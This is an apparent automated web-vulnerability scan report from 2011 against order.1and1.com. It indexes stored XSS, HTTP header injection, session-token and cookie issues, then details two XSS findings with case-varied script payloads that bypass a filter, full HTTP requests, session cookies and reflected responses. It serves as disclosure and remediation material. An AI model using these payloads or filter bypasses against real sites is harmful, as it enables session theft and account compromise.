Stored XSS, Permanent Cross Site Scripting, order.1and1.com, DORK, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'

Report generated by XSS.CX at Sun Mar 20 13:56:02 CDT 2011.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog
Loading

1. Cross-site scripting (stored)

1.1. http://order.1and1.com/xml/order/CloudDynamicServer [REST URL parameter 3]

1.2. http://order.1and1.com/xml/order/DomaininfoMove [REST URL parameter 3]

1.3. http://order.1and1.com/xml/order/Eshops [REST URL parameter 3]

1.4. http://order.1and1.com/xml/order/FeatureDatabaseDatabase [REST URL parameter 3]

1.5. http://order.1and1.com/xml/order/FeatureEmailEmail [REST URL parameter 3]

1.6. http://order.1and1.com/xml/order/FeatureEmailWebmail [REST URL parameter 3]

1.7. http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback [REST URL parameter 3]

1.8. http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch [REST URL parameter 3]

1.9. http://order.1and1.com/xml/order/FeatureMarketingCtrStat [REST URL parameter 3]

1.10. http://order.1and1.com/xml/order/FeatureSite-buildingCgi [REST URL parameter 3]

1.11. http://order.1and1.com/xml/order/FeatureSite-buildingDsc [REST URL parameter 3]

1.12. http://order.1and1.com/xml/order/FeatureSite-buildingElements [REST URL parameter 3]

1.13. http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery [REST URL parameter 3]

1.14. http://order.1and1.com/xml/order/FeatureSite-buildingWsb [REST URL parameter 3]

1.15. http://order.1and1.com/xml/order/Gtc [REST URL parameter 3]

1.16. http://order.1and1.com/xml/order/Home [REST URL parameter 3]

1.17. http://order.1and1.com/xml/order/Hosting [REST URL parameter 3]

1.18. http://order.1and1.com/xml/order/Hosting [REST URL parameter 3]

1.19. http://order.1and1.com/xml/order/Hosting [REST URL parameter 3]

1.20. http://order.1and1.com/xml/order/Instant [REST URL parameter 3]

1.21. http://order.1and1.com/xml/order/MailInstantMail [REST URL parameter 3]

1.22. http://order.1and1.com/xml/order/MsHosting [REST URL parameter 3]

1.23. http://order.1and1.com/xml/order/Service [REST URL parameter 3]

1.24. http://order.1and1.com/xml/order/Sharepoint [REST URL parameter 3]

1.25. http://order.1and1.com/xml/order/VirtualServerL [REST URL parameter 3]

1.26. http://order.1and1.com/xml/order/popupDomainPrices [REST URL parameter 3]

2. HTTP header injection

2.1. http://order.1and1.com/xml/order/Jumpto [jsessionid parameter]

2.2. http://order.1and1.com/xml/order/Jumpto [linkId parameter]

2.3. http://order.1and1.com/xml/order/Jumpto [linkOrigin parameter]

2.4. http://order.1and1.com/xml/order/Jumpto [name of an arbitrarily supplied request parameter]

2.5. http://order.1and1.com/xml/order/Jumpto [origin.page parameter]

2.6. http://order.1and1.com/xml/order/Jumpto [page parameter]

2.7. http://order.1and1.com/xml/order/Jumpto [site parameter]

2.8. http://order.1and1.com/xml/order/Jumpto [sourcearea parameter]

2.9. http://order.1and1.com/xml/order/domaincheck [__lf parameter]

2.10. http://order.1and1.com/xml/order/domaincheck [jsessionid parameter]

2.11. http://order.1and1.com/xml/order/tariffselect [__lf parameter]

2.12. http://order.1and1.com/xml/order/tariffselect [jsessionid parameter]

3. Session token in URL

3.1. http://order.1and1.com/links

3.2. http://order.1and1.com/xml/order

3.3. http://order.1and1.com/xml/order/AboutUs

3.4. http://order.1and1.com/xml/order/CloudDynamicServer

3.5. http://order.1and1.com/xml/order/CloudDynamicServer

3.6. http://order.1and1.com/xml/order/Contact

3.7. http://order.1and1.com/xml/order/Domaininfo

3.8. http://order.1and1.com/xml/order/DomaininfoMove

3.9. http://order.1and1.com/xml/order/Eshops

3.10. http://order.1and1.com/xml/order/FeatureCommunicationToolsChat

3.11. http://order.1and1.com/xml/order/FeatureCommunicationToolsChat

3.12. http://order.1and1.com/xml/order/FeatureCommunicationToolsDialogue

3.13. http://order.1and1.com/xml/order/FeatureCommunicationToolsMerchandise

3.14. http://order.1and1.com/xml/order/FeatureCommunicationToolsNewsletter

3.15. http://order.1and1.com/xml/order/FeatureControlCenter

3.16. http://order.1and1.com/xml/order/FeatureDatabaseAccess

3.17. http://order.1and1.com/xml/order/FeatureDatabaseDatabase

3.18. http://order.1and1.com/xml/order/FeatureDatabaseMssql

3.19. http://order.1and1.com/xml/order/FeatureDomainDns

3.20. http://order.1and1.com/xml/order/FeatureDomainDomains

3.21. http://order.1and1.com/xml/order/FeatureDomainPdr

3.22. http://order.1and1.com/xml/order/FeatureDreamweaver

3.23. http://order.1and1.com/xml/order/FeatureEmailEmail

3.24. http://order.1and1.com/xml/order/FeatureEmailVirusscan

3.25. http://order.1and1.com/xml/order/FeatureEmailWebmail

3.26. http://order.1and1.com/xml/order/FeatureFtpBackup

3.27. http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback

3.28. http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch

3.29. http://order.1and1.com/xml/order/FeatureMarketingCtrGoogleAdWords

3.30. http://order.1and1.com/xml/order/FeatureMarketingCtrSesub

3.31. http://order.1and1.com/xml/order/FeatureMarketingCtrStat

3.32. http://order.1and1.com/xml/order/FeatureParallelsPlesk

3.33. http://order.1and1.com/xml/order/FeatureParallelsSB

3.34. http://order.1and1.com/xml/order/FeatureSecurityCertificate

3.35. http://order.1and1.com/xml/order/FeatureServerDedOsLinux

3.36. http://order.1and1.com/xml/order/FeatureServerDedOsLinuxOpt

3.37. http://order.1and1.com/xml/order/FeatureServerDedOsWindows

3.38. http://order.1and1.com/xml/order/FeatureServerDedOsWindowsOpt

3.39. http://order.1and1.com/xml/order/FeatureServerFirewall

3.40. http://order.1and1.com/xml/order/FeatureServerHarddrive

3.41. http://order.1and1.com/xml/order/FeatureServerMonitoring

3.42. http://order.1and1.com/xml/order/FeatureServerMonitoringCloud

3.43. http://order.1and1.com/xml/order/FeatureServerProcessor

3.44. http://order.1and1.com/xml/order/FeatureServerRecovery

3.45. http://order.1and1.com/xml/order/FeatureServerSsl

3.46. http://order.1and1.com/xml/order/FeatureServerVpsOsLinux

3.47. http://order.1and1.com/xml/order/FeatureServerVpsOsWindows

3.48. http://order.1and1.com/xml/order/FeatureSite-buildingAsp

3.49. http://order.1and1.com/xml/order/FeatureSite-buildingBlog

3.50. http://order.1and1.com/xml/order/FeatureSite-buildingBlog

3.51. http://order.1and1.com/xml/order/FeatureSite-buildingCgi

3.52. http://order.1and1.com/xml/order/FeatureSite-buildingCnba

3.53. http://order.1and1.com/xml/order/FeatureSite-buildingCnba

3.54. http://order.1and1.com/xml/order/FeatureSite-buildingContentmoduls

3.55. http://order.1and1.com/xml/order/FeatureSite-buildingDriving

3.56. http://order.1and1.com/xml/order/FeatureSite-buildingDsc

3.57. http://order.1and1.com/xml/order/FeatureSite-buildingElements

3.58. http://order.1and1.com/xml/order/FeatureSite-buildingMailinglist

3.59. http://order.1and1.com/xml/order/FeatureSite-buildingMap

3.60. http://order.1and1.com/xml/order/FeatureSite-buildingNet

3.61. http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery

3.62. http://order.1and1.com/xml/order/FeatureSite-buildingRss

3.63. http://order.1and1.com/xml/order/FeatureSite-buildingWsb

3.64. http://order.1and1.com/xml/order/FeatureToolsRatepoint

3.65. http://order.1and1.com/xml/order/FeatureWebdesignIstock

3.66. http://order.1and1.com/xml/order/FeatureWebspaceExplorer

3.67. http://order.1and1.com/xml/order/FeatureWebspaceExplorer

3.68. http://order.1and1.com/xml/order/FirstWebsite

3.69. http://order.1and1.com/xml/order/Gtc

3.70. http://order.1and1.com/xml/order/Home

3.71. http://order.1and1.com/xml/order/Home

3.72. http://order.1and1.com/xml/order/Hosting

3.73. http://order.1and1.com/xml/order/Hosting

3.74. http://order.1and1.com/xml/order/Instant

3.75. http://order.1and1.com/xml/order/International

3.76. http://order.1and1.com/xml/order/Jumpto

3.77. http://order.1and1.com/xml/order/LocalSubmission

3.78. http://order.1and1.com/xml/order/Mail

3.79. http://order.1and1.com/xml/order/Mail

3.80. http://order.1and1.com/xml/order/MailInstantMail

3.81. http://order.1and1.com/xml/order/MailXchange

3.82. http://order.1and1.com/xml/order/MicrosoftExchange

3.83. http://order.1and1.com/xml/order/Moneyback

3.84. http://order.1and1.com/xml/order/MsHosting

3.85. http://order.1and1.com/xml/order/MsHosting

3.86. http://order.1and1.com/xml/order/MsHosting9d4af%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(String.fromCharCode(88,83,83))%3C/ScRiPt%3E542f10c1a1e

3.87. http://order.1and1.com/xml/order/News

3.88. http://order.1and1.com/xml/order/News

3.89. http://order.1and1.com/xml/order/PrivacyPolicy

3.90. http://order.1and1.com/xml/order/Server

3.91. http://order.1and1.com/xml/order/Server

3.92. http://order.1and1.com/xml/order/ServerPremium

3.93. http://order.1and1.com/xml/order/Service

3.94. http://order.1and1.com/xml/order/Sharepoint

3.95. http://order.1and1.com/xml/order/TcSpecialOffers

3.96. http://order.1and1.com/xml/order/TellAFriend

3.97. http://order.1and1.com/xml/order/VirtualServer

3.98. http://order.1and1.com/xml/order/VirtualServer

3.99. http://order.1and1.com/xml/order/VirtualServerL

3.100. http://order.1and1.com/xml/order/VirtualServerL

3.101. http://order.1and1.com/xml/order/VirtualServerXL

3.102. http://order.1and1.com/xml/order/VirtualServerXXL

3.103. http://order.1and1.com/xml/order/a

3.104. http://order.1and1.com/xml/order/addon

3.105. http://order.1and1.com/xml/order/costs

3.106. http://order.1and1.com/xml/order/domaincheck

3.107. http://order.1and1.com/xml/order/domaincheck

3.108. http://order.1and1.com/xml/order/eshopupselling

3.109. http://order.1and1.com/xml/order/eshopupselling

3.110. http://order.1and1.com/xml/order/popupDomainPrices

3.111. http://order.1and1.com/xml/order/popupDomainPrices

3.112. http://order.1and1.com/xml/order/popupGreenPower

3.113. http://order.1and1.com/xml/order/popupPayPalInfo

3.114. http://order.1and1.com/xml/order/popupServerOsCds

3.115. http://order.1and1.com/xml/order/popupServerOsVps

3.116. http://order.1and1.com/xml/order/popupTcGoogleAdwords

3.117. http://order.1and1.com/xml/order/popupWebsiteMagazine

3.118. http://order.1and1.com/xml/order/sitedesign

3.119. http://order.1and1.com/xml/order/tariffselect

3.120. http://order.1and1.com/xml/webservice/VDSPriceService

4. Cross-domain Referer leakage

4.1. http://order.1and1.com/xml/order/CloudDynamicServer

4.2. http://order.1and1.com/xml/order/Eshops

4.3. http://order.1and1.com/xml/order/FeatureSite-buildingMap

4.4. http://order.1and1.com/xml/order/Home

4.5. http://order.1and1.com/xml/order/Hosting

4.6. http://order.1and1.com/xml/order/Instant

4.7. http://order.1and1.com/xml/order/LocalSubmission

4.8. http://order.1and1.com/xml/order/Mail

4.9. http://order.1and1.com/xml/order/MailInstantMail

4.10. http://order.1and1.com/xml/order/MailXchange

4.11. http://order.1and1.com/xml/order/MicrosoftExchange

4.12. http://order.1and1.com/xml/order/MsHosting

4.13. http://order.1and1.com/xml/order/Server

4.14. http://order.1and1.com/xml/order/ServerPremium

4.15. http://order.1and1.com/xml/order/Sharepoint

4.16. http://order.1and1.com/xml/order/VirtualServer

4.17. http://order.1and1.com/xml/order/VirtualServerL

4.18. http://order.1and1.com/xml/order/eshopupselling

5. Cookie without HttpOnly flag set

5.1. http://order.1and1.com/xml/order

5.2. http://order.1and1.com/xml/order

5.3. http://order.1and1.com/xml/order/AboutUs

5.4. http://order.1and1.com/xml/order/AboutUs

5.5. http://order.1and1.com/xml/order/CloudDynamicServer

5.6. http://order.1and1.com/xml/order/CloudDynamicServer

5.7. http://order.1and1.com/xml/order/Contact

5.8. http://order.1and1.com/xml/order/Domaininfo

5.9. http://order.1and1.com/xml/order/Domaininfo

5.10. http://order.1and1.com/xml/order/DomaininfoMove

5.11. http://order.1and1.com/xml/order/DomaininfoMove

5.12. http://order.1and1.com/xml/order/Eshops

5.13. http://order.1and1.com/xml/order/Eshops

5.14. http://order.1and1.com/xml/order/FeatureCommunicationToolsChat

5.15. http://order.1and1.com/xml/order/FeatureCommunicationToolsChat

5.16. http://order.1and1.com/xml/order/FeatureCommunicationToolsDialogue

5.17. http://order.1and1.com/xml/order/FeatureCommunicationToolsDialogue

5.18. http://order.1and1.com/xml/order/FeatureCommunicationToolsMerchandise

5.19. http://order.1and1.com/xml/order/FeatureCommunicationToolsMerchandise

5.20. http://order.1and1.com/xml/order/FeatureCommunicationToolsNewsletter

5.21. http://order.1and1.com/xml/order/FeatureCommunicationToolsNewsletter

5.22. http://order.1and1.com/xml/order/FeatureControlCenter

5.23. http://order.1and1.com/xml/order/FeatureControlCenter

5.24. http://order.1and1.com/xml/order/FeatureDatabaseAccess

5.25. http://order.1and1.com/xml/order/FeatureDatabaseDatabase

5.26. http://order.1and1.com/xml/order/FeatureDatabaseDatabase

5.27. http://order.1and1.com/xml/order/FeatureDatabaseMssql

5.28. http://order.1and1.com/xml/order/FeatureDomainDns

5.29. http://order.1and1.com/xml/order/FeatureDomainDns

5.30. http://order.1and1.com/xml/order/FeatureDomainDomains

5.31. http://order.1and1.com/xml/order/FeatureDomainDomains

5.32. http://order.1and1.com/xml/order/FeatureDomainPdr

5.33. http://order.1and1.com/xml/order/FeatureDomainPdr

5.34. http://order.1and1.com/xml/order/FeatureDreamweaver

5.35. http://order.1and1.com/xml/order/FeatureDreamweaver

5.36. http://order.1and1.com/xml/order/FeatureEmailEmail

5.37. http://order.1and1.com/xml/order/FeatureEmailEmail

5.38. http://order.1and1.com/xml/order/FeatureEmailVirusscan

5.39. http://order.1and1.com/xml/order/FeatureEmailVirusscan

5.40. http://order.1and1.com/xml/order/FeatureEmailWebmail

5.41. http://order.1and1.com/xml/order/FeatureEmailWebmail

5.42. http://order.1and1.com/xml/order/FeatureFtpBackup

5.43. http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback

5.44. http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback

5.45. http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch

5.46. http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch

5.47. http://order.1and1.com/xml/order/FeatureMarketingCtrGoogleAdWords

5.48. http://order.1and1.com/xml/order/FeatureMarketingCtrGoogleAdWords

5.49. http://order.1and1.com/xml/order/FeatureMarketingCtrSesub

5.50. http://order.1and1.com/xml/order/FeatureMarketingCtrSesub

5.51. http://order.1and1.com/xml/order/FeatureMarketingCtrStat

5.52. http://order.1and1.com/xml/order/FeatureMarketingCtrStat

5.53. http://order.1and1.com/xml/order/FeatureParallelsPlesk

5.54. http://order.1and1.com/xml/order/FeatureParallelsSB

5.55. http://order.1and1.com/xml/order/FeatureSecurityCertificate

5.56. http://order.1and1.com/xml/order/FeatureSecurityCertificate

5.57. http://order.1and1.com/xml/order/FeatureServerDedOsLinux

5.58. http://order.1and1.com/xml/order/FeatureServerDedOsLinuxOpt

5.59. http://order.1and1.com/xml/order/FeatureServerDedOsWindows

5.60. http://order.1and1.com/xml/order/FeatureServerDedOsWindowsOpt

5.61. http://order.1and1.com/xml/order/FeatureServerFirewall

5.62. http://order.1and1.com/xml/order/FeatureServerHarddrive

5.63. http://order.1and1.com/xml/order/FeatureServerMonitoring

5.64. http://order.1and1.com/xml/order/FeatureServerMonitoringCloud

5.65. http://order.1and1.com/xml/order/FeatureServerProcessor

5.66. http://order.1and1.com/xml/order/FeatureServerRecovery

5.67. http://order.1and1.com/xml/order/FeatureServerSsl

5.68. http://order.1and1.com/xml/order/FeatureServerVpsOsLinux

5.69. http://order.1and1.com/xml/order/FeatureServerVpsOsWindows

5.70. http://order.1and1.com/xml/order/FeatureSite-buildingAsp

5.71. http://order.1and1.com/xml/order/FeatureSite-buildingBlog

5.72. http://order.1and1.com/xml/order/FeatureSite-buildingBlog

5.73. http://order.1and1.com/xml/order/FeatureSite-buildingCgi

5.74. http://order.1and1.com/xml/order/FeatureSite-buildingCgi

5.75. http://order.1and1.com/xml/order/FeatureSite-buildingCnba

5.76. http://order.1and1.com/xml/order/FeatureSite-buildingCnba

5.77. http://order.1and1.com/xml/order/FeatureSite-buildingContentmoduls

5.78. http://order.1and1.com/xml/order/FeatureSite-buildingContentmoduls

5.79. http://order.1and1.com/xml/order/FeatureSite-buildingDriving

5.80. http://order.1and1.com/xml/order/FeatureSite-buildingDriving

5.81. http://order.1and1.com/xml/order/FeatureSite-buildingDsc

5.82. http://order.1and1.com/xml/order/FeatureSite-buildingDsc

5.83. http://order.1and1.com/xml/order/FeatureSite-buildingElements

5.84. http://order.1and1.com/xml/order/FeatureSite-buildingElements

5.85. http://order.1and1.com/xml/order/FeatureSite-buildingMailinglist

5.86. http://order.1and1.com/xml/order/FeatureSite-buildingMailinglist

5.87. http://order.1and1.com/xml/order/FeatureSite-buildingMap

5.88. http://order.1and1.com/xml/order/FeatureSite-buildingMap

5.89. http://order.1and1.com/xml/order/FeatureSite-buildingNet

5.90. http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery

5.91. http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery

5.92. http://order.1and1.com/xml/order/FeatureSite-buildingRss

5.93. http://order.1and1.com/xml/order/FeatureSite-buildingRss

5.94. http://order.1and1.com/xml/order/FeatureSite-buildingWsb

5.95. http://order.1and1.com/xml/order/FeatureSite-buildingWsb

5.96. http://order.1and1.com/xml/order/FeatureToolsRatepoint

5.97. http://order.1and1.com/xml/order/FeatureToolsRatepoint

5.98. http://order.1and1.com/xml/order/FeatureWebdesignIstock

5.99. http://order.1and1.com/xml/order/FeatureWebdesignIstock

5.100. http://order.1and1.com/xml/order/FeatureWebspaceExplorer

5.101. http://order.1and1.com/xml/order/FeatureWebspaceExplorer

5.102. http://order.1and1.com/xml/order/FirstWebsite

5.103. http://order.1and1.com/xml/order/FirstWebsite

5.104. http://order.1and1.com/xml/order/Gtc

5.105. http://order.1and1.com/xml/order/Gtc

5.106. http://order.1and1.com/xml/order/Home

5.107. http://order.1and1.com/xml/order/Home

5.108. http://order.1and1.com/xml/order/Hosting

5.109. http://order.1and1.com/xml/order/Hosting

5.110. http://order.1and1.com/xml/order/Instant

5.111. http://order.1and1.com/xml/order/Instant

5.112. http://order.1and1.com/xml/order/International

5.113. http://order.1and1.com/xml/order/International

5.114. http://order.1and1.com/xml/order/Jumpto

5.115. http://order.1and1.com/xml/order/Jumpto

5.116. http://order.1and1.com/xml/order/LocalSubmission

5.117. http://order.1and1.com/xml/order/LocalSubmission

5.118. http://order.1and1.com/xml/order/Mail

5.119. http://order.1and1.com/xml/order/Mail

5.120. http://order.1and1.com/xml/order/MailInstantMail

5.121. http://order.1and1.com/xml/order/MailInstantMail

5.122. http://order.1and1.com/xml/order/MailXchange

5.123. http://order.1and1.com/xml/order/MailXchange

5.124. http://order.1and1.com/xml/order/MicrosoftExchange

5.125. http://order.1and1.com/xml/order/MicrosoftExchange

5.126. http://order.1and1.com/xml/order/Moneyback

5.127. http://order.1and1.com/xml/order/Moneyback

5.128. http://order.1and1.com/xml/order/MsHosting

5.129. http://order.1and1.com/xml/order/MsHosting9d4af%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(String.fromCharCode(88,83,83))%3C/ScRiPt%3E542f10c1a1e

5.130. http://order.1and1.com/xml/order/Mshosting

5.131. http://order.1and1.com/xml/order/News

5.132. http://order.1and1.com/xml/order/News

5.133. http://order.1and1.com/xml/order/PrivacyPolicy

5.134. http://order.1and1.com/xml/order/PrivacyPolicy

5.135. http://order.1and1.com/xml/order/Server

5.136. http://order.1and1.com/xml/order/Server

5.137. http://order.1and1.com/xml/order/ServerPremium

5.138. http://order.1and1.com/xml/order/ServerPremium

5.139. http://order.1and1.com/xml/order/Service

5.140. http://order.1and1.com/xml/order/Service

5.141. http://order.1and1.com/xml/order/Sharepoint

5.142. http://order.1and1.com/xml/order/Sharepoint

5.143. http://order.1and1.com/xml/order/TcSpecialOffers

5.144. http://order.1and1.com/xml/order/TcSpecialOffers

5.145. http://order.1and1.com/xml/order/TellAFriend

5.146. http://order.1and1.com/xml/order/TellAFriend

5.147. http://order.1and1.com/xml/order/VirtualServer

5.148. http://order.1and1.com/xml/order/VirtualServer

5.149. http://order.1and1.com/xml/order/VirtualServerL

5.150. http://order.1and1.com/xml/order/VirtualServerL

5.151. http://order.1and1.com/xml/order/VirtualServerXL

5.152. http://order.1and1.com/xml/order/VirtualServerXXL

5.153. http://order.1and1.com/xml/order/a

5.154. http://order.1and1.com/xml/order/addon

5.155. http://order.1and1.com/xml/order/costs

5.156. http://order.1and1.com/xml/order/domaincheck

5.157. http://order.1and1.com/xml/order/domaincheck

5.158. http://order.1and1.com/xml/order/eshopupselling

5.159. http://order.1and1.com/xml/order/eshopupselling

5.160. http://order.1and1.com/xml/order/popupDomainPrices

5.161. http://order.1and1.com/xml/order/popupDomainPrices

5.162. http://order.1and1.com/xml/order/popupGreenPower

5.163. http://order.1and1.com/xml/order/popupGreenPower

5.164. http://order.1and1.com/xml/order/popupPayPalInfo

5.165. http://order.1and1.com/xml/order/popupServerOsCds

5.166. http://order.1and1.com/xml/order/popupServerOsVps

5.167. http://order.1and1.com/xml/order/popupTcGoogleAdwords

5.168. http://order.1and1.com/xml/order/popupTcGoogleAdwords

5.169. http://order.1and1.com/xml/order/popupWebsiteMagazine

5.170. http://order.1and1.com/xml/order/sitedesign

5.171. http://order.1and1.com/xml/order/tariffselect

5.172. http://order.1and1.com/xml/order/tariffselect

6. Email addresses disclosed

6.1. http://order.1and1.com/xml/order/FeatureDomainPdr

6.2. http://order.1and1.com/xml/order/International

6.3. http://order.1and1.com/xml/order/Mail

6.4. http://order.1and1.com/xml/order/MailXchange

6.5. http://order.1and1.com/xml/order/PrivacyPolicy

7. Content type incorrectly stated



1. Cross-site scripting (stored)  next
There are 26 instances of this issue:

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach targe users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://order.1and1.com/xml/order/CloudDynamicServer [REST URL parameter 3]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/CloudDynamicServer

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/CloudDynamicServer is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/CloudDynamicServer. The payload be5ae</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>0f854fb8bb3 was submitted in the REST URL parameter 3. This input was returned as be5ae</ScRiPt ><ScRiPt>alert(1)</ScRiPt>0f854fb8bb3 in a subsequent request for the URL /xml/order/CloudDynamicServer.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/CloudDynamicServerbe5ae</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>0f854fb8bb3;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Mail&linkId=hd.nav.mail
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=MsHosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=CY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiQkIyEfISQ=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:28:AAABLtRlv0buZKhKd4Brz4n6cVt6806K:1300643561286; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Request 2

GET /xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Mail&linkId=hd.nav.mail
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=MsHosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=CY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiQkIyEfISQ=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:28:AAABLtRlv0buZKhKd4Brz4n6cVt6806K:1300643561286; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:54:14 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=fYGw8P0A2X19fWWxiaS9nYS4gKmNWUCg/SUMrLywsKykrKSYmKSgiJSkcHh0cGT5Db2RmdCwuKVkyXGsxJCUhICUhHyIgGjkwLzhwcTcsM2NsMiUmIiEmIyEhIB4cNTg=; Expires=Fri, 07-Apr-2079 21:08:22 GMT; Path=/
ETag: dafe46acb36a9f556844954eae96d32c
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 63338


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
pfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="CloudDynamicServer";UNOUNO.params.lastpage="CloudDynamicServerbe5ae</ScRiPt ><ScRiPt>alert(1)</ScRiPt>0f854fb8bb3";UNOUNO.params.articles="0"};
   //-->
...[SNIP]...

1.2. http://order.1and1.com/xml/order/DomaininfoMove [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/DomaininfoMove

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/DomaininfoMove is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/DomaininfoMove. The payload d1dbe</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>3ccb96b7437 was submitted in the REST URL parameter 3. This input was returned as d1dbe</ScRiPt ><ScRiPt>alert(1)</ScRiPt>3ccb96b7437 in a subsequent request for the URL /xml/order/DomaininfoMove.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

